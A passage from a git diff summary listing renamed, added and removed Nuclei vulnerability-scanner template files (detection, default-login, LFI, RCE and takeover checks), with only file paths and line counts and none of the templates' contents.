...7717.yaml => global-domains-xss-7718.yaml} | 0 .../Other/globalprotect-panel-7719.yaml | 20 + .../Other/globalprotect-panel-7721.yaml | 21 - ...unauth-7722.yaml => gloo-unauth-7726.yaml} | 0 .../Other/glpi-9.3.3-sql-injection(1).yaml | 25 - .../Other/glpi-authentication-7729.yaml | 25 - .../Other/glpi-authentication.yaml | 21 + .../Other/glpi-default-login-7732.yaml | 67 + .../Other/glpi-default-login-7733.yaml | 63 - ....yaml => glpi-directory-listing-7734.yaml} | 0 .../Other/glpidirectorylisting(1).yaml | 56 - .../Other/glpidirectorylisting.yaml | 56 + .../Other/go-anywhere-client-7743.yaml | 21 + .../Other/go-anywhere-client.yaml | 21 - .../Other/gocd-cruise-configuration-7748.yaml | 6 +- nuclei-templates/Other/gocd-login-7751.yaml | 24 - nuclei-templates/Other/gocd-login-7753.yaml | 24 + ...e.yaml => gogs-install-exposure-7757.yaml} | 0 ...-workflow-7760.yaml => gogs-workflow.yaml} | 0 ...p-1-lfi-7761.yaml => goip-1-lfi-7764.yaml} | 0 .../Other/google-api-key-7766.yaml | 20 - .../Other/google-api-key-7769.yaml | 19 + ...778.yaml => google-earth-dlogin-7780.yaml} | 0 .../Other/google-floc-disabled-7783.yaml | 20 + .../Other/google-floc-disabled-7786.yaml | 18 - ...ebook-secrets.yaml => google-secrets.yaml} | 0 .../Other/google-storage-7790.yaml | 18 + nuclei-templates/Other/google-storage.yaml | 17 - ...aces.yaml => google-textsearchplaces.yaml} | 0 .../Other/gophish-default-login-7792.yaml | 56 - .../Other/gophish-default-login.yaml | 49 + .../Other/gophish-login-7796.yaml | 23 - nuclei-templates/Other/gophish-login.yaml | 20 + .../Other/gradio-CVE-2024-1561.yaml | 78 - .../Other/gradio-CVE-2024-1728.yaml | 74 - .../Other/gradle-enterprise-panel-7800.yaml | 18 - .../Other/gradle-enterprise-panel.yaml | 21 + ...1.yaml => grafana-default-login-7803.yaml} | 0 .../Other/grafana-detect-7808.yaml | 17 - .../Other/grafana-detect-7809.yaml | 16 + .../Other/grafana-file-read-7812.yaml | 27 - .../Other/grafana-file-read-7813.yaml | 33 + ...p-7814.yaml => grafana-public-signup.yaml} | 0 .../Other/graphite-browser-7824.yaml | 4 - ...-7827.yaml => graphql-array-batching.yaml} | 0 .../Other/graphql-detect-7829.yaml | 158 + .../Other/graphql-detect-7830.yaml | 153 - ...834.yaml => graphql-field-suggestion.yaml} | 0 .../Other/graphql-get-method-7835.yaml | 34 - .../Other/graphql-get-method-7836.yaml | 36 + .../Other/grav-cms-detect-7844.yaml | 27 - nuclei-templates/Other/grav-cms-detect.yaml | 27 + .../Other/graylog-api-browser-7846.yaml | 24 + .../Other/graylog-api-browser.yaml | 23 - .../Other/groovy-console-open.yaml | 35 - .../Other/groupoffice-lfi-7849.yaml | 26 + .../Other/groupoffice-lfi-7851.yaml | 21 - nuclei-templates/Other/gsoap-lfi-7853.yaml | 23 - nuclei-templates/Other/gsoap-lfi-7855.yaml | 24 + ...AC2900-login.yaml => gt-ac2900-login.yaml} | 0 .../Other/gunicorn-detect-7863.yaml | 5 +- ...nly-nuclei.yaml => h2csmuggle-nuclei.yaml} | 0 nuclei-templates/Other/h3c-imc-rce-7871.yaml | 27 + nuclei-templates/Other/h3c-imc-rce.yaml | 39 - .../Other/hadoop-exposure-7872.yaml | 16 - .../Other/hadoop-exposure-7874.yaml | 16 + ...op-unauth.yaml => hadoop-unauth-7877.yaml} | 0 nuclei-templates/Other/hanming-lfr-7880.yaml | 29 + nuclei-templates/Other/hanming-lfr.yaml | 33 - .../Other/hanwang-detect-7881.yaml | 6 +- .../Other/haproxy-status-7883.yaml | 19 + .../Other/haproxy-status-7885.yaml | 21 - nuclei-templates/Other/harbor-detect.yaml | 6 +- ...orkflow-7889.yaml => harbor-workflow.yaml} | 0 ...7896.yaml => hashicorp-consul-webgui.yaml} | 0 .../Other/hasura-graphql-psql-exec-7901.yaml | 42 - .../Other/hasura-graphql-psql-exec.yaml | 35 + .../Other/hasura-graphql-ssrf-7905.yaml | 45 + .../Other/hasura-graphql-ssrf.yaml | 42 - .../Other/hatenablog-takeover-7908.yaml | 18 + .../Other/hatenablog-takeover-7910.yaml | 15 - .../header-blind-time-sql-injection.yaml | 25 + .../Other/header-command-injection-7918.yaml | 18 +- .../Other/header-injection(1).yaml | 185 - ...over.yaml => helpjuice-takeover-7928.yaml} | 0 .../Other/helpscout-takeover-7936.yaml | 8 +- .../Other/heroku-takeover-7944.yaml | 5 +- .../Other/herokuapp-detect-7938.yaml | 5 +- nuclei-templates/Other/hiboss-rce-7949.yaml | 31 - nuclei-templates/Other/hiboss-rce.yaml | 26 + .../Other/hikvision-detection-7954.yaml | 6 +- .../Other/hitron-technologies-7961.yaml | 49 +- ...7963.yaml => hivemanager-login-panel.yaml} | 0 .../hjtcloud-arbitrary-file-read-7971.yaml | 41 - .../Other/hjtcloud-arbitrary-file-read.yaml | 37 + ...jtcloud-rest-arbitrary-file-read-7976.yaml | 34 + .../hjtcloud-rest-arbitrary-file-read.yaml | 36 - .../Other/hmc-hybris-panel-7977.yaml | 19 + .../Other/hmc-hybris-panel-7978.yaml | 19 - .../Other/home-assistant-7979.yaml | 16 - .../Other/home-assistant-7980.yaml | 16 + .../homeautomation-v3-openredirect-7982.yaml | 10 +- .../honeywell-building-control-7987.yaml | 24 - .../Other/honeywell-building-control.yaml | 20 + .../Other/honeywell-scada-config-7991.yaml | 4 +- ...995.yaml => honeywell-web-controller.yaml} | 0 .../Other/hongdian-default-login-7998.yaml | 41 - .../Other/hongdian-default-login-7999.yaml | 48 + nuclei-templates/Other/horizon.yaml | 22 - ...oisoning.yaml => hostheaderpoisoning.yaml} | 0 ...aml => hp-color-laserjet-detect-8006.yaml} | 0 ...0.yaml => hp-device-info-detect-8009.yaml} | 0 ...=> hp-ilo-serial-key-disclosure-8024.yaml} | 0 ...8027.yaml => hp-laserjet-detect-8028.yaml} | 0 .../Other/hp-media-vault-detect-8031.yaml | 49 +- .../Other/hp-service-manager-8033.yaml | 23 - .../Other/hp-service-manager-8034.yaml | 23 + .../Other/hp-switch-default-login-8036.yaml | 66 +- .../hpe-system-management-anonymous-8011.yaml | 21 - .../hpe-system-management-anonymous.yaml | 21 + .../hpe-system-management-login-8014.yaml | 27 + .../Other/hpe-system-management-login.yaml | 27 - ...sort-fileread.yaml => hsort-fileRead.yaml} | 0 .../{hst-fileread.yaml => hst-fileRead.yaml} | 0 ...-config.yaml => htaccess-config-8043.yaml} | 0 .../Other/htpasswd-detection.yaml | 25 - nuclei-templates/Other/htpasswd.yaml | 25 + ...> http-missing-security-headers-8058.yaml} | 0 .../{http-raw.yaml => http-raw-multiple.yaml} | 0 ...ts-header.yaml => http-xframe-header.yaml} | 0 .../Other/httpbin-open-redirect-8048.yaml | 28 + .../Other/httpbin-open-redirect-8049.yaml | 27 - ...bin-panel-8050.yaml => httpbin-panel.yaml} | 0 nuclei-templates/Other/httpbin-xss-8052.yaml | 19 - nuclei-templates/Other/httpbin-xss.yaml | 15 + ...aml => huatian-oa-upload-file-upload.yaml} | 0 ...> huawei-HG532e-default-router-login.yaml} | 0 .../Other/huawei-hg659-lfi-8067.yaml | 21 + .../Other/huawei-hg659-lfi-8069.yaml | 26 - .../Other/huawei-home-gateway-8072.yaml | 24 + .../Other/huawei-home-gateway.yaml | 24 - ...ml => huawei-router-auth-bypass-8073.yaml} | 0 .../Other/hubspot-takeover-8078.yaml | 20 + .../Other/hubspot-takeover-8079.yaml | 18 - .../Other/hue-default-credential-8080.yaml | 70 - .../Other/hue-default-credential-8081.yaml | 62 + ...ml => huijietong-cloud-fileread-8082.yaml} | 0 .../ibm-advanced-system-management-8088.yaml | 20 - .../ibm-advanced-system-management-8090.yaml | 23 + .../ibm-friendly-path-exposure-8093.yaml | 36 - .../Other/ibm-friendly-path-exposure.yaml | 36 + .../Other/ibm-http-server-8095.yaml | 30 - .../Other/ibm-http-server-8097.yaml | 29 + .../Other/ibm-infoprint-lfi-8105.yaml | 23 + nuclei-templates/Other/ibm-infoprint-lfi.yaml | 23 - ...aml => ibm-mqseries-web-console-8109.yaml} | 0 .../Other/ibm-note-login-8112.yaml | 23 + nuclei-templates/Other/ibm-note-login.yaml | 24 - .../ibm-security-access-manager-8113.yaml | 33 + .../Other/ibm-security-access-manager.yaml | 34 - .../Other/ibm-service-assistant-8118.yaml | 24 + .../Other/ibm-service-assistant.yaml | 20 - .../ibm-storage-default-credential-8125.yaml | 3 +- ....yaml => iceflow-vpn-disclosure-8128.yaml} | 0 .../Other/icewarp-open-redirect.yaml | 44 + .../Other/icewarp-openredirects.yaml | 31 - ...l => idemia-biometrics-default-login.yaml} | 0 ...aml => identity-services-engine-8147.yaml} | 0 ...dentityguard-selfservice-entrust-8142.yaml | 21 - ...n-params(1).yaml => idor-vuln-params.yaml} | 0 .../iis-errorpage-detection-all-lang.yaml | 17 + .../iis-internal-ip-disclosure-8149.yaml | 69 +- ...name-8153.yaml => iis-shortname-8151.yaml} | 0 .../{ilo-detect-8155.yaml => ilo-detect.yaml} | 0 .../Other/improper-bucket-sse.yaml | 58 + .../Other/infinitt-pacs-file-upload.yaml | 57 + .../Other/infinitt-pacs-info-leak.yaml | 39 + ...-detect.yaml => influxdb-detect-8160.yaml} | 0 .../Other/insecure-provider-path.yaml | 20 + ...spur-clusterengine-default-login-8162.yaml | 45 + .../inspur-clusterengine-default-login.yaml | 49 - ...s-login-8163.yaml => intelbras-login.yaml} | 0 ...erver.yaml => interactsh-server-8165.yaml} | 0 ...eover-8169.yaml => intercom-takeover.yaml} | 0 .../Other/interlib-fileread-8172.yaml | 27 - nuclei-templates/Other/interlib-fileread.yaml | 23 + ...e-8178.yaml => internet-service-8177.yaml} | 0 ...s.yaml => iomega-emc-shared-nas-8181.yaml} | 0 ...d.yaml => ioncube-loader-wizard-8184.yaml} | 0 ...e.yaml => iotawatt-app-exposure-8186.yaml} | 0 ...8191.yaml => iplanet-web-server-8190.yaml} | 0 nuclei-templates/Other/ipstack.yaml | 17 - ...in.yaml => iptime-default-login-8194.yaml} | 0 .../Other/iptime-router-8195.yaml | 30 - nuclei-templates/Other/iptime-router.yaml | 30 + .../issuu-panel-lfi.yaml} | 0 .../{email.yaml => iterate-values-flow.yaml} | 0 nuclei-templates/Other/itop-detect-8201.yaml | 5 - .../{itop-panel.yaml => itop-panel-8205.yaml} | 0 .../Other/jamf-log4j-jndi-rce-8212.yaml | 38 - .../Other/jamf-log4j-jndi-rce-8214.yaml | 33 + ...f-panel-8216.yaml => jamf-panel-8215.yaml} | 0 .../Other/jaspersoft-detect-8218.yaml | 19 - nuclei-templates/Other/jaspersoft-detect.yaml | 16 + .../Other/java-melody-xss-8226.yaml | 7 +- .../Other/java-rmi-detect-8228.yaml | 21 - nuclei-templates/Other/java-rmi-detect.yaml | 21 + .../Other/jazzhr-takeover-8235.yaml | 7 +- nuclei-templates/Other/jboss-detect-8237.yaml | 30 + nuclei-templates/Other/jboss-detect.yaml | 26 - ...tatus-8243.yaml => jboss-web-console.yaml} | 0 .../Other/jdbc-connection-string-8244.yaml | 5 +- nuclei-templates/Other/jeecg-boot-detect.yaml | 3 +- ...om-detect-8249.yaml => jeedom-detect.yaml} | 0 nuclei-templates/Other/jeewms-lfi-8254.yaml | 36 + nuclei-templates/Other/jeewms-lfi-8255.yaml | 28 - ...-detect-8258.yaml => jellyfin-detect.yaml} | 0 ...panel.yaml => jenkins-api-panel-8263.yaml} | 0 .../Other/jenkins-asyncpeople-8264.yaml | 22 - .../Other/jenkins-asyncpeople-8266.yaml | 20 + ...assword.yaml => jenkins-default-8272.yaml} | 0 .../Other/jenkins-detect-8275.yaml | 29 + nuclei-templates/Other/jenkins-detect.yaml | 32 - .../Other/jenkins-login-detection.yaml | 21 - nuclei-templates/Other/jenkins-login.yaml | 27 + .../Other/jenkins-script-8281.yaml | 22 + .../Other/jenkins-script-8284.yaml | 23 - .../Other/jenkins-stack-trace-8285.yaml | 24 + .../Other/jenkins-stack-trace.yaml | 27 - .../Other/jenkins-unauthenticated.yaml | 23 + .../Other/jetbrains-datasources-8291.yaml | 24 - .../Other/jetbrains-datasources.yaml | 24 + .../Other/jetbrains-takeover-8294.yaml | 11 +- ...ml => jetty-showcontexts-enable-8295.yaml} | 0 nuclei-templates/Other/jfrog-8303.yaml | 19 - nuclei-templates/Other/jfrog-8306.yaml | 31 + ...2.yaml => jfrog-unauth-build-exposed.yaml} | 0 .../Other/jinfornet-jreport-lfi-8308.yaml | 19 - .../Other/jinfornet-jreport-lfi.yaml | 27 + ...8311.yaml => jinher-oa-default-login.yaml} | 0 nuclei-templates/Other/jira-detect-8314.yaml | 29 + nuclei-templates/Other/jira-detect-8315.yaml | 25 - nuclei-templates/Other/jira-login-check.yaml | 47 + .../Other/jira-login-default.yaml | 46 - ...aml => jira-service-desk-signup-8321.yaml} | 0 .../jira-unauthenticated-dashboards-8327.yaml | 27 - .../jira-unauthenticated-dashboards.yaml | 34 + ...nauthenticated-installed-gadgets-8328.yaml | 25 + ...ira-unauthenticated-installed-gadgets.yaml | 21 - ...authenticated-projectcategories-8334.yaml} | 0 ...yaml => jira-unauthenticated-screens.yaml} | 0 .../Other/jkstatus-manager-8346.yaml | 18 - .../Other/jkstatus-manager-8347.yaml | 17 + ...jmx-console-8348.yaml => jmx-console.yaml} | 0 ...login-8355.yaml => jmx-default-login.yaml} | 0 nuclei-templates/Other/jolokia-list-8361.yaml | 28 - nuclei-templates/Other/jolokia-list.yaml | 28 + .../Other/jolokia-mbean-search-8362.yaml | 58 +- .../jolokia-unauthenticated-lfi-8365.yaml | 26 + .../Other/jolokia-unauthenticated-lfi.yaml | 31 - .../Other/{jolokia-8369.yaml => jolokia.yaml} | 0 .../Other/joomla-com-fabrik-lfi-8371.yaml | 27 + .../Other/joomla-com-fabrik-lfi-8373.yaml | 24 - ...8376.yaml => joomla-config-file-8377.yaml} | 0 .../Other/joomla-file-listing-8379.yaml | 30 - .../Other/joomla-file-listing-8380.yaml | 26 + .../Other/joomla-htaccess-8383.yaml | 30 + nuclei-templates/Other/joomla-htaccess.yaml | 25 - .../Other/joomla-manifest-file-8388.yaml | 25 - .../Other/joomla-manifest-file.yaml | 31 + nuclei-templates/Other/joomla-panel-8391.yaml | 18 - nuclei-templates/Other/joomla-panel-8392.yaml | 18 + .../Other/joomla-workflow-8393.yaml | 13 - .../Other/joomla-workflow-8394.yaml | 13 + nuclei-templates/Other/js-analyse.yaml | 95 + nuclei-templates/Other/jsecret.yaml | 84 - ...detection.yaml => jsf-detection-8397.yaml} | 0 nuclei-templates/Other/jumpcloud.yaml | 19 - ....yaml => jupyter-ipython-unauth-8402.yaml} | 0 nuclei-templates/Other/jupyter-notebook.yaml | 32 +- .../Other/jupyterhub-default-login-8401.yaml | 40 + .../Other/jupyterhub-default-login.yaml | 36 - .../{jwt-token.yaml => jwt-token-8408.yaml} | 0 nuclei-templates/Other/kafdrop-xss-8411.yaml | 23 - nuclei-templates/Other/kafdrop-xss-8414.yaml | 24 + .../kafka-center-default-login-8417.yaml | 38 + .../Other/kafka-center-default-login.yaml | 41 - .../Other/kafka-center-login-8418.yaml | 18 - .../Other/kafka-center-login-8419.yaml | 21 + ...ect-ui.yaml => kafka-connect-ui-8423.yaml} | 0 ....yaml => kafka-consumer-monitor-8424.yaml} | 0 .../Other/kafka-topics-ui-8435.yaml | 17 + nuclei-templates/Other/kafka-topics-ui.yaml | 17 - ...-lfi.yaml => karel-ip-phone-lfi-8438.yaml} | 0 .../Other/keenetic-web-login-8443.yaml | 6 +- .../Other/kenesto-login-8444.yaml | 25 - nuclei-templates/Other/kenesto-login.yaml | 26 + ...ogin-8446.yaml => kentico-login-8447.yaml} | 0 ...-8456.yaml => kevinlab-bems-backdoor.yaml} | 0 ...sqli-8457.yaml => kevinlab-bems-sqli.yaml} | 0 .../Other/kevinlab-device-detect-8461.yaml | 30 + .../Other/kevinlab-device-detect.yaml | 26 - .../Other/kevinlab-hems-backdoor-8463.yaml | 41 - .../Other/kevinlab-hems-backdoor-8466.yaml | 35 + .../Other/key-cloak-admin-panel-8468.yaml | 24 - .../Other/key-cloak-admin-panel.yaml | 20 + ...json-8472.yaml => keycloak-json-8473.yaml} | 0 nuclei-templates/Other/keycloak-xss-8480.yaml | 24 - nuclei-templates/Other/keycloak-xss-8481.yaml | 27 + ...bana-panel-8487.yaml => kibana-panel.yaml} | 0 ...kingdee-eas-directory-traversal-8489.yaml} | 0 ...d.yaml => kingsoft-v8-file-read-8491.yaml} | 0 ...er-8492.yaml => kinsta-takeover-8494.yaml} | 0 .../Other/kiwitcms-login-8497.yaml | 11 +- nuclei-templates/Other/kong-detect-8501.yaml | 26 + nuclei-templates/Other/kong-detect.yaml | 23 - ...lt-login.yaml => konga-default-login.yaml} | 0 ...ts.yaml => kube-api-deployments-8503.yaml} | 0 .../Other/kube-api-nodes-8507.yaml | 25 + .../Other/kube-api-nodes-8508.yaml | 25 - ...-api-pods.yaml => kube-api-pods-8509.yaml} | 0 .../Other/kube-api-secrets-8512.yaml | 1 + ...ml => kubeflow-dashboard-unauth-8515.yaml} | 0 .../Other/kubelet-metrics-8521.yaml | 30 - nuclei-templates/Other/kubelet-metrics.yaml | 26 + ...-pods-8523.yaml => kubelet-pods-8522.yaml} | 0 .../Other/kubernetes-dashboard-enabled.yaml | 57 + .../kubernetes-enterprise-manager-8530.yaml | 8 +- ...ernetes-kustomization-disclosure-8532.yaml | 33 + .../kubernetes-kustomization-disclosure.yaml | 29 - .../Other/kubernetes-metrics-8534.yaml | 29 - .../Other/kubernetes-metrics-8536.yaml | 29 + .../Other/kubernetes-pods-8543.yaml | 25 + nuclei-templates/Other/kubernetes-pods.yaml | 19 - ...9.yaml => kubernetes-resource-report.yaml} | 0 .../Other/kyocera-m2035dn-lfi-8558.yaml | 26 - .../Other/kyocera-m2035dn-lfi.yaml | 22 + nuclei-templates/Other/lacie-panel-8561.yaml | 31 - nuclei-templates/Other/lacie-panel.yaml | 31 + .../Other/lancom-router-panel-8564.yaml | 18 - .../Other/lancom-router-panel.yaml | 18 + nuclei-templates/Other/landingi-takeover.yaml | 7 +- ...571.yaml => landray-oa-fileread-8570.yaml} | 0 .../Other/lansweeper-login-8573.yaml | 26 - nuclei-templates/Other/lansweeper-login.yaml | 22 + .../Other/laravel-debug-enabled-8574.yaml | 19 - .../Other/laravel-debug-enabled-8577.yaml | 23 + nuclei-templates/Other/laravel-env-8581.yaml | 33 +- ...ger.yaml => laravel-filemanager-8591.yaml} | 0 ...93.yaml => laravel-ignition-xss-8592.yaml} | 0 ...g-file.yaml => laravel-log-file-8595.yaml} | 0 ...scope-8600.yaml => laravel-telescope.yaml} | 0 .../Other/launchrock-takeover-8602.yaml | 18 + .../Other/launchrock-takeover-8605.yaml | 15 - nuclei-templates/Other/learnpress.yaml | 58 + .../Other/leostream-panel-8609.yaml | 19 +- nuclei-templates/Other/lfi-linux-fuzz.yaml | 98 - nuclei-templates/Other/lfi.yaml | 66 - .../Other/liferay-portal-detect-8625.yaml | 23 - .../Other/liferay-portal-detect-8626.yaml | 21 + nuclei-templates/Other/liferay.yaml | 21 + .../Other/limit-networkaccess-disabled.yaml | 70 + ...nkedin-id.yaml => linkedin-client-id.yaml} | 0 .../Other/linkerd-badrule-detect-8630.yaml | 38 - .../Other/linkerd-badrule-detect.yaml | 36 + ....yaml => linkerd-service-detect-8634.yaml} | 0 .../Other/linkerd-ssrf-detect-8637.yaml | 21 - .../Other/linkerd-ssrf-detect-8638.yaml | 58 - .../Other/linkerd-ssrf-detect-8639.yaml | 57 + .../Other/linkerd-ssrf-detect-8640.yaml | 18 + nuclei-templates/Other/linux-lfi-fuzz.yaml | 80 + ...48.yaml => liveview-axis-camera-8646.yaml} | 0 ...2024-2116.yaml => local-file-include.yaml} | 0 .../Other/local-file-inclusion.yaml | 67 + ...fuzz2.yaml => log4j-fuzz-head-poc-v1.yaml} | 0 nuclei-templates/Other/log4j-url.yaml | 31 - nuclei-templates/Other/log4jshell.yaml | 36 + nuclei-templates/Other/loganalyzer.yaml | 34 - .../{logins (copy 1).yaml => logins.yaml} | 0 ...s-rce-8653.yaml => lotuscms-rce-8651.yaml} | 0 nuclei-templates/Other/lucee-detect-8659.yaml | 18 - nuclei-templates/Other/lucee-detect-8661.yaml | 22 + nuclei-templates/Other/lucee-login-8665.yaml | 25 - nuclei-templates/Other/lucee-login.yaml | 22 + .../Other/lucee-stack-trace-8667.yaml | 21 - .../Other/lucee-stack-trace-8670.yaml | 22 + .../Other/maccmsv10-backdoor-8685.yaml | 26 + .../Other/maccmsv10-backdoor.yaml | 25 - ...i-8687.yaml => magento-2-exposed-api.yaml} | 0 .../Other/magento-admin-panel-8694.yaml | 21 + .../Other/magento-admin-panel.yaml | 21 - .../Other/magento-cacheleak-8696.yaml | 33 + nuclei-templates/Other/magento-cacheleak.yaml | 30 - .../Other/magento-config-8700.yaml | 24 - .../Other/magento-config-8702.yaml | 28 + .../Other/magento-config-disclosure.yaml | 57 - .../Other/magento-detect-8706.yaml | 32 - .../Other/magento-detect-8707.yaml | 28 + .../Other/magento-information-disclosure.yaml | 50 + ...aml => magento-unprotected-dev-files.yaml} | 0 .../{adobe-magento.yaml => magento.yaml} | 0 .../Other/magicflow-lfi-8710.yaml | 26 - .../Other/magicflow-lfi-8712.yaml | 21 + nuclei-templates/Other/magmi-detect-8716.yaml | 23 - nuclei-templates/Other/magmi-detect.yaml | 22 + .../Other/mailchimp-api-11854.yaml | 3 - .../Other/mailchimp-api-key-8725.yaml | 36 +- ...gun-api-11855.yaml => mailgun-api(1).yaml} | 0 .../Other/{api-mailgun.yaml => mailgun.yaml} | 0 ...l => manageengine-adselfservice-8736.yaml} | 0 .../Other/manageengine-analytics-8743.yaml | 23 - .../Other/manageengine-analytics.yaml | 20 + .../manageengine-apex-helpdesk-8747.yaml | 24 - .../Other/manageengine-apex-helpdesk.yaml | 19 + ...nageengine-applications-manager-8752.yaml} | 0 .../manageengine-assetexplorer-8757.yaml | 23 - .../manageengine-assetexplorer-8758.yaml | 24 + .../Other/manageengine-desktop-8761.yaml | 23 + .../Other/manageengine-desktop.yaml | 20 - ....yaml => manageengine-keymanagerplus.yaml} | 0 .../Other/manageengine-opmanager-8768.yaml | 23 + .../Other/manageengine-opmanager.yaml | 26 - ...aml => manageengine-servicedesk-8771.yaml} | 0 .../manageengine-supportcenter-8776.yaml | 20 - .../Other/manageengine-supportcenter.yaml | 23 + nuclei-templates/Other/match-1.yaml | 15 + ...hop-sqli.yaml => maticsoft-shop-sqli.yaml} | 0 ...-8788.yaml => mautic-crm-detect-8787.yaml} | 0 ...rce-8793.yaml => mcafee-epo-rce-8794.yaml} | 0 .../Other/medium-takeover-8798.yaml | 17 + nuclei-templates/Other/medium-takeover.yaml | 20 - .../Other/meshcentral-login-8803.yaml | 25 + nuclei-templates/Other/meshcentral-login.yaml | 21 - ...se-panel.yaml => metabase-panel-8806.yaml} | 0 ...a-aws-8810.yaml => metadata-aws-8811.yaml} | 0 .../Other/metadata-azure-8813.yaml | 46 + .../Other/metadata-azure-8815.yaml | 42 - .../Other/metadata-digitalocean-8817.yaml | 43 + .../Other/metadata-digitalocean-8818.yaml | 39 - .../Other/metadata-hetzner-8822.yaml | 42 + .../Other/metadata-hetzner-8824.yaml | 46 - .../Other/metadata-openstack-8825.yaml | 39 + .../Other/metadata-openstack-8826.yaml | 39 - .../Other/metadata-oracle-8830.yaml | 36 + .../Other/metadata-oracle-8831.yaml | 40 - .../Other/metadata-service-alibaba.yaml | 4 - ...ag-cms-8833.yaml => metatag-cms-8832.yaml} | 0 ....yaml => metersphere-plugin-rce-8835.yaml} | 0 nuclei-templates/Other/metinfo-lfi-8838.yaml | 24 - nuclei-templates/Other/metinfo-lfi-8840.yaml | 30 + .../Other/microsoft-exchange-panel-8850.yaml | 24 - .../Other/microsoft-exchange-panel.yaml | 20 + ...microsoft-exchange-server-detect-8853.yaml | 31 - ...microsoft-exchange-server-detect-8854.yaml | 26 + ... => microsoft-exchange-workflow-8855.yaml} | 0 .../Other/microsoft-teams-webhook-8856.yaml | 15 - .../Other/microsoft-teams-webhook-8858.yaml | 17 + .../Other/microweber-detect-8863.yaml | 26 - nuclei-templates/Other/microweber-detect.yaml | 22 + ...eber-xss-8864.yaml => microweber-xss.yaml} | 0 ...869.yaml => mida-eframework-xss-8866.yaml} | 0 ...aph-8870.yaml => mikrotik-graph-8871.yaml} | 0 ...-8873.yaml => mikrotik-routeros-8875.yaml} | 0 .../Other/minimouse-lfi-8879.yaml | 25 - nuclei-templates/Other/minimouse-lfi.yaml | 23 + .../Other/minio-browser-8882.yaml | 20 - .../Other/minio-browser-8883.yaml | 24 + .../Other/minio-console-8886.yaml | 26 - nuclei-templates/Other/minio-console.yaml | 26 + ....yaml => minio-default-password-8891.yaml} | 0 ...etect-8894.yaml => minio-detect-8892.yaml} | 0 nuclei-templates/Other/minio_fileLeak.yaml | 71 + .../Other/mirai-unknown-rce-8898.yaml | 3 - ...00.yaml => misconfigured-docker-8902.yaml} | 0 .../mlflow-CVE-2024-3848.yaml} | 0 nuclei-templates/Other/mobileiron(1).yaml | 22 - .../Other/mobileiron-log4j-jndi-rce-8904.yaml | 45 + .../Other/mobileiron-log4j-jndi-rce-8906.yaml | 46 - nuclei-templates/Other/mobileiron.yaml | 25 + .../Other/mobotix-guest-camera-8911.yaml | 2 - .../Other/mofi4500-default-login-8914.yaml | 43 - .../Other/mofi4500-default-login.yaml | 37 + .../Other/moinmoin-detect-8915.yaml | 26 - .../Other/moinmoin-detect-8916.yaml | 30 + .../Other/mongodb-detect-8919.yaml | 20 + .../Other/mongodb-detect-8920.yaml | 24 - .../Other/mongodb-ops-manager-8922.yaml | 22 - .../Other/mongodb-ops-manager-8924.yaml | 22 + ...uth-8927.yaml => mongodb-unauth-8926.yaml} | 0 .../Other/monitorix-exposure-8930.yaml | 26 + .../Other/monitorix-exposure-8933.yaml | 28 - .../Other/moodle-changelog-8936.yaml | 31 + nuclei-templates/Other/moodle-changelog.yaml | 26 - .../Other/moodle-filter-jmol-lfi-8937.yaml | 28 + .../Other/moodle-filter-jmol-lfi-8940.yaml | 30 - .../Other/moodle-filter-jmol-xss-8946.yaml | 31 - .../Other/moodle-filter-jmol-xss-8947.yaml | 20 + nuclei-templates/Other/moodle-xss-8948.yaml | 27 + nuclei-templates/Other/moodle-xss-8950.yaml | 27 - ...ogin-8953.yaml => movable-type-login.yaml} | 0 ...ransfer-detect.yaml => moveit-detect.yaml} | 0 ...psec-lfi-8957.yaml => mpsec-lfi-8954.yaml} | 0 nuclei-templates/Other/ms-adcs-detect.yaml | 7 +- ...s-exchange-server-reflected-xss-8965.yaml} | 0 nuclei-templates/Other/msmtp-config-8967.yaml | 11 +- .../{msvod-sqli-8969.yaml => msvod-sqli.yaml} | 0 nuclei-templates/Other/munin.yaml | 20 + .../Other/mx-fingerprint-8973.yaml | 33 + nuclei-templates/Other/mx-fingerprint.yaml | 22 - .../Other/mx-service-detector-8974.yaml | 69 - .../Other/mx-service-detector-8977.yaml | 71 + .../Other/mysql-native-password-8980.yaml | 18 + .../Other/mysql-native-password-8981.yaml | 15 - ...cms-lfr-8985.yaml => myucms-lfr-8987.yaml} | 0 .../Other/nagios-default-login-8991.yaml | 31 + .../Other/nagios-default-login-8993.yaml | 34 - .../Other/nameserver-fingerprint-8998.yaml | 30 + .../Other/nameserver-fingerprint.yaml | 22 - ...yaml => natshell-path-traversal-9008.yaml} | 0 nuclei-templates/Other/natshell-rce-9009.yaml | 22 + nuclei-templates/Other/natshell-rce-9012.yaml | 26 - nuclei-templates/Other/neos-detect-9014.yaml | 33 + nuclei-templates/Other/neos-detect.yaml | 27 - nuclei-templates/Other/nessus.yaml | 24 + ...etcore-unauth.yaml => netcore-unauth.yaml} | 0 .../netdata-dashboard-detected-9022.yaml | 49 +- ...-Ngfw-Rce.yaml => netentsec-ngfw-rce.yaml} | 0 .../Other/netflix-conductor-ui-9023.yaml | 35 + .../Other/netflix-conductor-ui.yaml | 29 - ...7.yaml => netgear-router-auth-bypass.yaml} | 0 ...yaml => netgear-router-exposure-9028.yaml} | 0 nuclei-templates/Other/netlify-cms-9041.yaml | 5 +- .../Other/netlify-takeover-9043.yaml | 24 + .../Other/netlify-takeover-9044.yaml | 20 - nuclei-templates/Other/netrc.yaml | 9 +- .../Other/netscalar-aaa-login-9047.yaml | 16 + .../Other/netscalar-aaa-login-9049.yaml | 18 - .../Other/netscaler-gateway-9056.yaml | 23 - nuclei-templates/Other/netscaler-gateway.yaml | 14 + .../Other/netsus-default-login-9060.yaml | 45 - .../Other/netsus-default-login.yaml | 40 + .../Other/netsus-server-login-9061.yaml | 24 + .../Other/netsus-server-login-9062.yaml | 20 - ...064.yaml => netsweeper-open-redirect.yaml} | 0 nuclei-templates/Other/nette-rce.yaml | 28 - ...t-9081.yaml => nextcloud-detect-9079.yaml} | 0 .../Other/nexus-default-login-9088.yaml | 36 - .../Other/nexus-default-login.yaml | 40 + nuclei-templates/Other/nexus-detect-9094.yaml | 23 - nuclei-templates/Other/nexus-detect.yaml | 23 + nuclei-templates/Other/nexus.yaml | 58 - nuclei-templates/Other/nginx-Detect.yaml | 19 - ...inx-config.yaml => nginx-config-9098.yaml} | 0 nuclei-templates/Other/nginx-detect.yaml | 22 + .../Other/nginx-linux-page-9102.yaml | 17 + .../Other/nginx-linux-page-9103.yaml | 19 - ...nx-merge-slashes-path-traversal-9104.yaml} | 0 .../Other/nginx-module-vts-xss-9106.yaml | 23 + .../Other/nginx-module-vts-xss-9108.yaml | 23 - .../Other/nginx-proxy-manager-9111.yaml | 28 + 